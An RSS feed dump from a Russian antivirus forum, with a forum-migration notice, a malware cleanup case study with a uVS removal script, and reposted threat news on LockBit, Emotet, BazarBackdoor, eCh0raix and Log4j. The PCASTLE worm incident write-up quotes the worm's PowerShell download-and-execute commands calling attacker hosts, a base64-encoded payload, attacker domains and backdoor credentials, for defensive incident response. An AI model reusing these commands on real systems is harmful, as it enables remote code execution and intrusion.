Форум esetnod32.ru [форум: Полезная информация] http://forum.esetnod32.ru Новые темы форума Полезная информация на сайте Форум esetnod32.ru [forum.esetnod32.ru] ru http://backend.userland.com/rss2 Sat, 04 Apr 2026 04:53:34 +0300 Переход на новый форум PRO32 Переход на новый форум PRO32 в форуме Полезная информация.
Дорогие участники форума! В ближайшее время форум будет переведен в режим работы "только для чтения", публикация новых тем и сообщений будет ограничена. Мы искренне благодарны вам за то, что были с нами, но пришло время двигаться дальше. После официального ухода компании ESET с российского рынка мы приступили к разработке новых продуктов вместе с новыми партнёрами. Приглашаем вас присоединиться к нашему новому форуму: https://forum.pro32.com/ Спасибо!
26.01.2025 21:21:36, Валентин Поляков.]]> http://forum.esetnod32.ru/messages/forum9/topic17991/message117367/ http://forum.esetnod32.ru/messages/forum9/topic17991/message117367/ Sun, 26 Jan 2025 21:21:36 +0300 Полезная информация Как Давид победил Голиафа Как Давид победил Голиафа в форуме Полезная информация.
К нам обратился Давид с вопросом, почему не все модули защиты включены после установки антивируса Pro32 Total Security. Так же он не смог активировать программу и обновить антивирусные базы.

Пользователь добавил изображение

С его слов, он не смог установить Avast и Kaspersky, а техподдержка не смогла решить вопрос.
Давид предусмотрительно выполнил сканирование системы и предоставил диагностические логи.
Что же мы видим по логам:
====code==== 
;================ Запуск результатов сканирования ==================
17-01-2023 12:18   C:\Program Files\RDP Wrapper\rdpwrap.dll   is an Unwanted-Program ( 00555edb1 )   Невозможно поместить в карантин
17-01-2023 13:16   C:\ProgramData\RunDLL\rundll.exe   is a Trojan ( 005292541 )   Невозможно поместить в карантин
17-01-2023 13:16   C:\ProgramData\RunDLL\system.exe   is an Exploit ( 005560f51 )   Невозможно поместить в карантин
17-01-2023 13:17   C:\ProgramData\Windows Tasks Service\winserv.exe   is an Unwanted-Program ( 005442fc1 )   Невозможно поместить в карантин
17-01-2023 13:17   C:\ProgramData\WindowsTask\MicrosoftHost.exe   is an Adware ( 0055fa291 )   Невозможно поместить в карантин
17-01-2023 13:42   C:\Windows\KMS-R@1nHook.dll   is an Unwanted-Program ( 004d38111 )   Невозможно поместить в карантин
17-01-2023 15:01   C:\Windows\SysWOW64\mintcastnetworks.dll   is a Trojan ( 0001140e1 )   Невозможно поместить в карантин
17-01-2023 13:17   C:\ProgramData\WindowsTask\win.exe   Файл зашифрован!   Ожидается действие ( Не подлежит лечению )
17-01-2023 13:16   C:\ProgramData\RunDLL\2x64.dll   is a Riskware ( 0040eff71 )   Был удален
17-01-2023 13:16   C:\ProgramData\RunDLL\2x86.dll   is a Trojan-Downloader ( 00536df71 )   Был удален

;------------------- Отчет-------------------
;Найденные файлы: 245056
;Просканированные файлы: 243605
;Зараженные файлы: 65
;Таблица разделов просканирована: 0
;просканировано загрузочных секторов : 0
;Проблемы, которые необходимо исправить: 7
;================ Конец результатов сканирования ==================
=============

Пользователь добавил изображение

Логи нас приятно удивили, не потому что система оказалась основательно поражена и заражена, а потому что в этой пораженной системе антивирус PRO32 Total Security смог установиться и обойти все «защитные доспехи и барьеры» этого поистине вирусного Голиафа: множественное активное заражение системы с процедурой восстановления через WMI, блокировку запуска установщиков антивирусных программ, блокировку путей установки антивирусных программ, блокировку доступа к сайтам и ресурсам антивирусных компаний и технических форумов. По словам Давида, после очистки системы вирусные файлы восстанавливались. И здесь без тонких инструментов окончательно победить Голиафа было крайне сложно.

План был простой: очистить систему от Голиафа — Microsofthost.exe, далее восстановить работу модулей защиты антивирусной программы, активировать, обновить базы и выполнить контрольное полное сканирование системы.

Используем uVS для очистки системы. (скрипты uVS индивидуальны для каждого случая).

====code==== 
;uVS v4.13 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
;------------------------autoscript---------------------------

delref HTTP://PW.WEBPUBLIC.ORG/POWER3.TXT')||POWERSHELL.EXE
delref HTTP://PW3CLEAR.DLLCALISO.ORG/POWERC3.TXT')||POWERSHELL.EXE
delref HTTP://PWEAR.DLLCALISO.ORG/PW.TXT')||POWERSHELL.EXE
delwmi %Sys32%\CMD.EXE
delall %SystemDrive%\PROGRAMDATA\WINDOWS TASKS SERVICE\WINSERV.EXE
zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\AUDIODG.EXE
addsgn 1A6E769A552B1E3B8236EFE32D4360156C0186D675489FF2838B3A7AD8D139B3E4ACC1573E559D9B5E870E890EE98FEAAFAC0C7287AFB7A63B3F5BE9D7D4512D 8  Win64/Packed.Themida.L 7

zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOST.EXE
addsgn BA6F9BB2BDD5FF720B9C2D754C2124FBDA75303A02FF85B08FC3813792F5BB0DD4C78774FE1196886F09811A8E1C4939355C045ABD5D982C2D3F21EFB30C9B65 23 Win64/CoinMiner.ACX 7

zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOST.EXE
zoo %SystemDrive%\PROGRAMDATA\REAITEKHD\TASKHOSTW.EXE
zoo %SystemDrive%\PROGRAMDATA\REALTEK\TASKHOSTW.EXE
zoo %SystemDrive%\PROGRAMDATA\RUNDLL\RUNDLL.EXE
addsgn 1A97749A5583D38FF42B254E3143FE8E608277F608C27C0BE823B096D3AE614F563348172A68BD4CB899F08A7B374C6964ABE64F77DF23355970992F879F2306 8 Python/Agent.BL [ESET-NOD32] 7

zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\MICROSOFTHOST.EXE
addsgn BA6F9BB2BD5149720B9C2D754C2160FBDA75303A4536D3B4490F09709C1ABD80EFDBA531314A19492B80849F0E95A5EA3156FC561953EC08253A97F48B8B7657 21 Win64/CoinMiner.QG 7

zoo %SystemDrive%\PROGRAMDATA\RUNDLL\SYSTEM.EXE
addsgn 1A7F749A5583368CF42BFB3A88A212FA30F69CB689056A707AD645DC10D61945271703A82B2DFD092BD07B8A327609FA201CBDF9B95B5C082E77A445D0EE667A 8 Win32/Exploit.Equation.M [ESET-NOD32] 7

zoo %SystemDrive%\PROGRAMDATA\RUNDLL\START.EXE
addsgn 1A69149A5583348CF42B254E3143FE53A8CFF4A6020BF7FA793C3A7B5622B50E239C050963979949EC81705B0416A0CD802017F9AA8F3BC07BFC55E8C1F2E631 8 Python/Agent.BT 7

zoo %SystemDrive%\PROGRAMDATA\WINDOWSTASK\APPMODULE.EXE
addsgn BA6F9BB2BD514E720B9C2D754C2160FBDA75303A6039BC78850F097063164849CB00BB5431C05D8AA8A511953E1549393556B4565D8FF8A18153E4D438F96AF2 8 Win64/CoinMiner.NZ 7

chklst
delvir

deldirex %SystemDrive%\PROGRAMDATA\RUNDLL


regt 14
deltmp
;
;
;
;-------------------------------------------------------------

restart
czoo
=============

После очистки системы от троянов и блокирующих элементов мы перешли к восстановлению работы антивирусной программы.
Выяснилось, что причиной незапуска служб может быть отсутствие прав системы для файлов каталога K7Computing

Пользователь добавил изображение

Добавили Систему с соответствующими разрешениями, все службы антивируса штатно запустились и все модули защиты включились.

Пользователь добавил изображение

Добавили дополнительно права Системы на другие каталоги и заработало обновление антивирусных баз.

После успешного обновления Давид смог выполнить полное сканирование системы, но к этому моменту остатки Голиафа были найдены только в карантинах. :).

(с), chklst.ru
08.02.2023 07:52:36, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic17114/message115359/ http://forum.esetnod32.ru/messages/forum9/topic17114/message115359/ Wed, 08 Feb 2023 07:52:36 +0300 Полезная информация Операторы LockBit используют Windows Defender для загрузки Cobalt Strike Операторы LockBit используют Windows Defender для загрузки Cobalt Strike в форуме Полезная информация.
Злоумышленники, связанные с LockBit 3.0, злоупотребляют инструментом командной строки Защитника Windows, чтобы загружать маяки Cobalt Strike на скомпрометированные системы и избегать обнаружения программным обеспечением безопасности.


====quote====
Cobalt Strike — это легитимный набор для тестирования на проникновение с обширными функциями, популярными среди злоумышленников, для скрытой разведки сети и горизонтального перемещения перед тем, как украсть данные и зашифровать их.
=============

Однако решения по обеспечению безопасности стали лучше обнаруживать маяки Cobalt Strike, что заставляет злоумышленников искать инновационные способы развертывания инструментария.

   В недавнем случае реакции на атаку LockBit исследователи из Sentinel Labs заметили злоупотребление инструментом командной строки Microsoft Defender «MpCmdRun.exe» для боковой загрузки вредоносных библиотек DLL, которые расшифровывают и устанавливают маяки Cobalt Strike.

Первоначальная компрометация сети в обоих случаях была осуществлена ​​путем использования уязвимости Log4j на уязвимых серверах VMWare Horizon для запуска кода PowerShell.

Неопубликованная загрузка маяков Cobalt Strike на скомпрометированные системы не является чем-то новым для LockBit, поскольку есть сообщения о подобных цепочках заражения, основанных на злоупотреблении утилитами командной строки VMware.

Злоупотребление Microsoft Defender

После установления доступа к целевой системе и получения необходимых пользовательских привилегий злоумышленники используют PowerShell для загрузки трех файлов: чистой копии утилиты Windows CL, файла DLL и файла журнала.


====quote====
   MpCmdRun.exe — это утилита командной строки для выполнения задач Microsoft Defender, которая поддерживает команды для сканирования на наличие вредоносных программ, сбора информации, восстановления элементов, выполнения диагностической трассировки и многого другого.
=============

При выполнении MpCmdRun.exe загрузит законную DLL с именем «mpclient.dll», которая необходима для правильной работы программы.

   В случае, проанализированном SentinelLabs, злоумышленники создали собственную версию mpclient.dll, предназначенную для использования в качестве оружия, и поместили ее в место, которое отдает приоритет загрузке вредоносной версии DLL-файла.

Исполняемый код загружает и расшифровывает зашифрованную полезную нагрузку Cobalt Strike из файла «c0000015.log», установленного вместе с двумя другими файлами на более ранней стадии атаки.

Пользователь добавил изображение

Хотя неясно, почему операторы LockBit переключились с VMware на инструменты командной строки Защитника Windows для боковой загрузки маяков Cobalt Strike, это может быть сделано для обхода целевых средств защиты, реализованных в ответ на предыдущий метод.

Использование легитимных инструментов для уклонения от обнаружения EDR и AV в наши дни чрезвычайно распространено; следовательно, организациям необходимо проверять свои средства управления безопасностью и проявлять бдительность, отслеживая использование законных исполняемых файлов, которые могут быть использованы злоумышленниками.

https://www.bleepingcomputer.com/news/security/lockbit-operator-abuses-windows-defender-to-load-cobalt-strike/
30.07.2022 11:12:17, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16855/message114324/ http://forum.esetnod32.ru/messages/forum9/topic16855/message114324/ Sat, 30 Jul 2022 11:12:17 +0300 Полезная информация Вредоносная программа Emotet теперь устанавливается через PowerShell в ярлыках Windows Вредоносная программа Emotet теперь устанавливается через PowerShell в ярлыках Windows в форуме Полезная информация.
Ботнет Emotet теперь использует файлы ярлыков Windows (.LNK), содержащие команды PowerShell, для заражения компьютеров жертв, отказываясь от макросов Microsoft Office, которые теперь отключены по умолчанию.

Использование файлов .LNK не ново, так как Emotet ранее использовала их в сочетании с кодом Visual Basic Script (VBS) для создания команды, загружающей полезную нагрузку. Однако они впервые использовали ярлыки Windows для прямого выполнения команд PowerShell.

Новая техника после неудачной кампании

В прошлую пятницу операторы Emotet прекратили фишинговую кампанию, потому что они испортили свой установщик после того, как использовали статическое имя файла для ссылки на вредоносный ярлык .LNK.

Запуск ярлыка запускал команду, которая извлекала строку кода VBS и добавляла ее в файл VBS для выполнения.

Однако, поскольку у распределенных файлов ярлыков было другое имя, чем статическое, которое они искали, это не помогло бы правильно создать файл VBS. Группа устранила проблему вчера.

Сегодня исследователи безопасности заметили, что Emotet перешел на новую технику, которая использует команды PowerShell, прикрепленные к LNK-файлу, для загрузки и выполнения скрипта на зараженном компьютере.

Вредоносная строка, добавляемая к файлу .LNK, запутывается и дополняется нулями (пробелом), чтобы она не отображалась в целевом поле (файл, на который указывает ярлык) диалогового окна свойств файла.

Вредоносный файл .LNK Emotet содержит URL-адреса нескольких скомпрометированных веб-сайтов, используемых для хранения полезной нагрузки сценария PowerShell. Если сценарий присутствует в одном из определенных мест, он загружается во временную папку системы как сценарий PowerShell со случайным именем.

Ниже представлена деобфусцированная версия вредоносной строки Emotet, прикрепленной к полезной нагрузке .LNK:

Пользователь добавил изображение

Этот сценарий создает и запускает другой сценарий PowerShell, который загружает вредоносное ПО Emotet из списка скомпрометированных сайтов и сохраняет его в папку %Temp%. Затем загруженная DLL запускается с помощью команды regsvr32.exe.

Выполнение сценария PowerShell выполняется с помощью утилиты командной строки Regsvr32.exe и заканчивается загрузкой и запуском вредоносного ПО Emotet.

Исследователь безопасности Макс Малютин говорит, что наряду с использованием PowerShell в файлах LNK этот поток выполнения является новым для развертывания вредоносного ПО Emotet.

Новая техника на подъеме

Исследовательская группа Cryptolaemus, которая внимательно следит за активностью Emotet, отмечает, что новая техника является явной попыткой злоумышленника обойти защиту и автоматическое обнаружение.

Исследователи безопасности из компании ESET, занимающейся кибербезопасностью, также заметили, что использование новой технологии Emotet увеличилось за последние 24 часа.

Данные телеметрии ESET показывают, что страны, наиболее затронутые Emotet с помощью новой технологии, — это Мексика, Италия, Япония, Турция и Канада.

Помимо перехода на PowerShell в файлах .LNK, операторы ботнета Emotet внесли несколько других изменений с тех пор, как в ноябре возобновили свою деятельность на более стабильном уровне, например, перешли на 64-битные модули.

Вредоносная программа обычно используется в качестве шлюза для других вредоносных программ, особенно угроз программ-вымогателей, таких как Conti.

https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/
03.05.2022 11:39:44, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16788/message114026/ http://forum.esetnod32.ru/messages/forum9/topic16788/message114026/ Tue, 03 May 2022 11:39:44 +0300 Полезная информация Текстовые файлы CSV, используются для установки вредоносного ПО BazarBackdoor Текстовые файлы CSV, используются для установки вредоносного ПО BazarBackdoor в форуме Полезная информация.
Новая фишинговая кампания использует специально созданные текстовые файлы CSV для заражения устройств пользователей вредоносным ПО BazarBackdoor.

Файл значений, разделенных запятыми (CSV), представляет собой текстовый файл, содержащий строки текста со столбцами данных, разделенными запятыми. Во многих случаях первая строка текста является заголовком или описанием для каждого столбца.

Использование файлов CSV — это популярный метод экспорта данных из приложений, которые затем можно импортировать в другие программы в качестве источника данных, будь то Excel, база данных, менеджеры паролей или программное обеспечение для выставления счетов.

   Поскольку CSV — это просто текст без исполняемого кода, многие люди считают эти типы файлов безвредными и могут быть более беззаботными при их открытии.

   Однако Microsoft Excel поддерживает функцию динамического обмена данными (DDE), которую можно использовать для выполнения команд, выходные данные которых вводятся в открытую электронную таблицу, включая файлы CSV.


К сожалению, злоумышленники также могут злоупотреблять этой функцией для выполнения команд, загружающих и устанавливающих вредоносные программы на ничего не подозревающих жертвах.

Файл CSV использует DDE для установки BazarBackdoor.

Новая фишинговая кампания, обнаруженная исследователем безопасности Крисом Кэмпбеллом, устанавливает троян BazarLoader/BazarBackdoor через вредоносные CSV-файлы.

BazarBackdoor — скрытая вредоносная программа-бэкдор, созданная группой TrickBot для предоставления злоумышленникам удаленного доступа к внутреннему устройству, которое можно использовать в качестве плацдарма для дальнейшего бокового перемещения в сети.

Фишинговые электронные письма выдают себя за «рекомендации по переводу платежей» со ссылками на удаленные сайты, которые загружают CSV-файл с именами, похожими на «document-21966.csv».

Пользователь добавил изображение

Как и все файлы CSV, файл document-21966.csv представляет собой просто текстовый файл со столбцами данных, разделенными запятыми

Пользователь добавил изображение

Однако замечаем, что один из столбцов данных содержит странный вызов WMIC в одном из столбцов данных, который запускает команду PowerShell.

Это =WmiC| Команда — это функция DDE, которая заставляет Microsoft Excel при наличии разрешения запускать WMIC.exe и выполнять предоставленную команду PowerShell для ввода данных в открытую книгу.

В этом конкретном случае DDE будет использовать WMIC для создания нового процесса PowerShell, который открывает удаленный URL-адрес, содержащий другую команду PowerShell, которая затем выполняется.

Команда удаленного сценария PowerShell, показанная ниже, загрузит файл picture.jpg и сохранит его как C:\Users\Public\87764675478.dll. Затем эта программа DLL запускается с помощью команды rundll32.exe.

Пользователь добавил изображение

Файл DLL установит BazarLoader, в конечном итоге развернув BazarBackdoor и другие полезные нагрузки на устройстве.

К счастью, когда этот CSV-файл открывается в Excel, программа обнаружит вызов DDE и предложит пользователю «включить автоматическое обновление ссылок», что помечено как проблема безопасности.

Даже если они активируют эту функцию, Excel покажет им другое приглашение, подтверждающее, следует ли разрешить WMIC начать доступ к удаленным данным.

Если пользователь подтвердит оба запроса, Microsoft Excel запустит сценарии PowerShell, DLL будет загружена и выполнена, а BazarBackdoor будет установлен на устройстве.

Хотя эта угроза требует от пользователей подтверждения того, что функция DDE должна быть разрешена для выполнения, генеральный директор AdvIntel Виталий Кремез сказал, что люди становятся жертвами продолжающейся фишинговой атаки.

«Исходя из данных телеметрии BazarBackdoor, за последние два дня мы обнаружили 102 реальных корпоративных и государственных жертвы, не входящих в песочницу, в результате этой фишинговой кампании», — пояснил Кремез в онлайн-обсуждении.

После установки BazarBackdoor злоумышленники получат доступ к корпоративной сети, которую атаки будут использовать для горизонтального распространения по всей сети.

В конечном итоге это может привести к дальнейшему заражению вредоносным ПО, краже данных и внедрению программ-вымогателей.

https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/
05.02.2022 13:14:15, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16711/message113821/ http://forum.esetnod32.ru/messages/forum9/topic16711/message113821/ Sat, 05 Feb 2022 13:14:15 +0300 Полезная информация Устройства QNAP NAS подверглись атакам программ-вымогателей ech0raix Устройства QNAP NAS подверглись атакам программ-вымогателей ech0raix в форуме Полезная информация.
Пользователи сетевых хранилищ (NAS) QNAP сообщают об атаках на свои системы с помощью программы-вымогателя eCh0raix, также известной как QNAPCrypt.

Злоумышленник, стоящий за этим конкретным вредоносным ПО, активизировал свою деятельность примерно за неделю до Рождества, взяв под контроль устройства с правами администратора.
Подскакивает количество атак перед Рождеством

Пользователи, управляющие системами QNAP и Synology NAS, регулярно сообщают об атаках программ-вымогателей eCh0raix, но около 20 декабря многие из них начали сообщать об инцидентах.

Скачок количества атак подтверждается службой вымогателей ID, количество заявок на которую начало расти 19 декабря и снизилось к 26 декабря.

Пользователь добавил изображение

Первоначальный вектор заражения пока неясен. Некоторые пользователи признают, что они были безрассудными и не защитили устройство должным образом (например, открыли доступ к Интернету через небезопасное соединение); другие утверждают, что уязвимость в Photo Station QNAP позволила злоумышленникам нанести ущерб.

Независимо от пути атаки, похоже, что злоумышленник eCh0raix создает пользователя в группе администраторов, что позволяет им шифровать все файлы в системе NAS.

Пользователи QNAP - некоторые из них используют устройство NAS в деловых целях - сообщили на форуме BleepingComputer, что вредоносная программа зашифровала изображения и документы.

Помимо всплеска числа атак, в этой кампании выделяется то, что злоумышленник неправильно ввел расширение для записки о выкупе и использовал расширение «.TXTT».

Пользователь добавил изображение

Важно отметить, что существует бесплатный дешифратор для файлов, заблокированных с помощью более старой версии (до 17 июля 2019 г.) вымогателя eCh0raix. Однако бесплатного решения для расшифровки данных, заблокированных последними версиями вредоносного ПО (версии 1.0.5 и 1.0.6), не существует.

Атаки с использованием eCh0raix / QNAPCrypt начались в июне 2019 года и с тех пор представляют собой постоянную угрозу. Ранее в этом году QNAP предупредил своих пользователей об очередном шквале атак eCh0raix в начале этого года, нацеленных на устройства со слабыми паролями.

Пользователи должны следовать рекомендациям QNAP, чтобы обеспечить надлежащую защиту своих устройств NAS и данных, которые они хранят.

https://www.bleepingcomputer.com/news/security/qnap-nas-devices-hit-in-surge-of-ech0raix-ransomware-attacks/
28.12.2021 08:16:55, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16676/message113562/ http://forum.esetnod32.ru/messages/forum9/topic16676/message113562/ Tue, 28 Dec 2021 08:16:55 +0300 Полезная информация Информация об уязвимости Log4j 2 Информация об уязвимости Log4j 2 в форуме Полезная информация.
Сведения об оповещении

10 декабря ESET начала исследование уязвимости в служебной программе Log4j 2 (CVE-2021-44228). Эта уязвимость может позволить злоумышленнику удаленно выполнить код.

Подробнее об уязвимости читайте в нашей статье WeLiveSecurity.

Команды инженеров ESET круглосуточно работают над выявлением, исправлением и защитой любых потенциально уязвимых систем. В настоящее время нам не известно о кражах данных.

Шаги по смягчению:следуйте инструкциям в статье WeLiveSecurity Уязвимость Log4Shell: что нам известно на данный момент.

Пользователи ESET Secure Authentication (ESA): пока не будет выпущено исправление для автоматического решения проблемы, обновляйте экземпляр Elasticsearch вручную.

Пользователи ESET Enterprise Inspector (EEI): пользователи могут добавлять правила обнаружения в EEI для обнаружения Log4j.

Список продуктов ESET, которые могут защитить вашу систему или сеть

С 11 декабря функция защиты от сетевых атак в продуктах безопасности ESET для Windows была обновлена для обнаружения эксплойтов уязвимости. ESET блокирует попытки атак с 14:24 по центральноевропейскому времени того же дня.

Следующие продукты ESET способны обнаруживать и блокировать потенциальную атаку на вашу систему или сеть. Если вы используете более раннюю версию продукта безопасности ESET, мы рекомендуем обновить продукт ESET до последней версии.

 
====quote====
 Продукты для бизнеса: ESET Endpoint Antivirus, ESET Endpoint Security и все продукты ESET Server Security версии 7.0 и новее.
    Потребительские продукты: ESET Internet Security, ESET Smart Security и ESET Smart Security Premium версии 6.0 и более поздних.
=============

Пользователь добавил изображение

Список продуктов ESET, подтвержденных как защищенные от уязвимости Log4j 2

По состоянию на 15 декабря продукты ESET, перечисленные ниже, были проверены и подтверждены, что они не подвержены уязвимости Log4j 2. Это означает, что следующие продукты нельзя использовать для удаленного выполнения кода.

    Локальные продукты:

ESET PROTECT
ESET Security Management Center
ESET Remote Administrator
ESET Enterprise Inspector
ESET NOD32 Antivirus/Internet Security/Smart Security Premium for Windows
ESET Endpoint Antivirus/Endpoint Security for Windows
ESET Server Security for Microsoft Windows Server (former ESET File Security for Microsoft Windows Server)
ESET Security for Microsoft SharePoint Server
ESET Mail Security for Exchange
ESET Mail Security for IBM Domino (former ESET Mail Security for IBM Lotus Domino)
ESET Mobile Security for Android
ESET Parental Control for Android
ESET HOME - Mobile Apps
ESET Server Security for Linux (former ESET File Security for Linux)
ESET Security for Kerio
ESET Endpoint Antivirus for Linux
ESET Virtualization Security for VMware NSX
ESET Mail/File/Gateway Security for Linux/BSD v4.5
ESET NOD32 Antivirus for Linux v4 (Home and Business Edition)
ESET Endpoint Antivirus/Endpoint Security for macOS
ESET Cyber Security/Cyber Security Pro
DEM for ConnectWise Automate
DEM for (Solarwinds) N-able
DEM for (Solarwinds) RMM
DEM for NinjaOne
DEM for Datto
PSA Plugins

Облачные продукты:

ESET PROTECT Cloud (former ESET Cloud Administrator)
ESET Enterprise Inspector Cloud
ESET Cloud Office Security
RMM for Kaseya
ESET Secure Authentication Cloud

Продукты для шифрования:

ESET Endpoint Encryption
ESET Endpoint Encryption for macOS
ESET Endpoint Encryption Server
ESET Full Disk Encryption
ESET Full Disk Encryption for macOS

Порталы:

ESET Business Accounts
ESET MSP Administrator
ESET License Administrator
ESET HOME

Инструменты / Другое:

ESET Shared Local Cache
Rogue Detection Sensor
Remote Deployment Tool

https://support.eset.com/en/alert8188-information-regarding-the-log4j2-vulnerability
17.12.2021 12:59:29, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16665/message113510/ http://forum.esetnod32.ru/messages/forum9/topic16665/message113510/ Fri, 17 Dec 2021 12:59:29 +0300 Полезная информация Червь-криптомайнер PS1.PCASTLE Червь-криптомайнер PS1.PCASTLE в форуме Полезная информация.
В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.

   
====quote====
Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
   Имя файла POWERSHELL.EXE
   Цифр. подпись Действительна, подписано Microsoft Windows
   Оригинальное имя PowerShell.EXE.MUI
   Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
   Описание Windows PowerShell
   Производитель Microsoft Corporation

   Доп. информация на момент обновления списка
   pid = 5100 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 4724 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:00 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 5496 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:10:00 [2021.09.14]
   Процесс завершен 08:10:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
=============


после включение записи лога DNS стали известны целевые адреса:


====quote====
  T[.]ZER2[.]COM, V[.]Y6H[.]NET
=============

далее, разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:


====quote====
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString("http://t[.]zer2[.]com/ipc.jsp?h")"
=============

и


====quote====
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBi­AEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcA­KAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBt­AD8AcwBtAGIAJwApAA==
=============

Пользователь добавил изображение

после декодирования строки:


====quote====
IEX (New-Object Net.WebClient).downloadstring('http://v[.]beahh[.]com/wm?smb')
=============

собственно, именно данный целевой адрес и детектировал антивирус:

====quote====
10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B
=============

родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline

Пользователь добавил изображение

поиск по известному cmdline позволил определить тип (Trojan.PS1.PCASTLE) и дополнительные детали вредоносного ПО, который распространился в сети:

   The following {Task Name} - {Task to be run} listed should be used in the steps identified below:


====quote====
  \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}
   \\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\")''
=============

и

   "More advanced options" option to include all hidden files and folders in the search result.


====quote====
  %Application Data%\sign.txt
   %Application Data%\flashplayer.tmp
   %User Startup%\run.bat
   %User Startup%\FlashPlayer.lnk

=============

данные файлы были найдены в карантине антивируса:


====quote====
   7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes

   896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes

   A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes
=============


некоторые детали данного червя

некоторые детали:
URLs used by updated worms for infection

http[:]//w.beahh.com/page.html
http[:]//v.beahh.com/

PowerShell URLs:
Note that these are URL fragments, and more information is usually encoded in the query string.

http[:]//v.y6h.net/g
http[:]//v.bddp.net/v
http[:]//v.bddp.net/wm

Domains
Some domains have many subdomains.
For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.

*.beahh[.]com
*.bddp[.]net
v.y6h[.]net
*.zer2[.]com
Scheduled task names:
\Microsoft\Windows\

   Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -> Нет файла <==== ВНИМАНИЕ


Filenames:
%APPDATA%\sign.txt
%APPDATA%\flashplayer.tmp
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk

Listening ports:
65530
65531
65532
65533

TCP traffic on ports:
This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)
65530
65531
65532
65533

Firewall rules:
DNS (allow TCP port 65531)
DNSS2 (allow TCP port 65531)
DNS2 (allow TCP port 65532)
DNSsql (allow TCP port 65533)
DNSd (allow TCP port 65533)
DNSS3 (allow TCP port 65533)

User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”
SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)


детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender
здесь
11.10.2021 13:37:17, santy.]]> http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/ http://forum.esetnod32.ru/messages/forum9/topic16580/message113145/ Mon, 11 Oct 2021 13:37:17 +0300 Полезная информация MyKings: медленный, но неустанный рост ботнета MyKings: медленный, но неустанный рост ботнета в форуме Полезная информация.
SophosLab ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.

MyKings: медленный, но неустанный рост ботнета

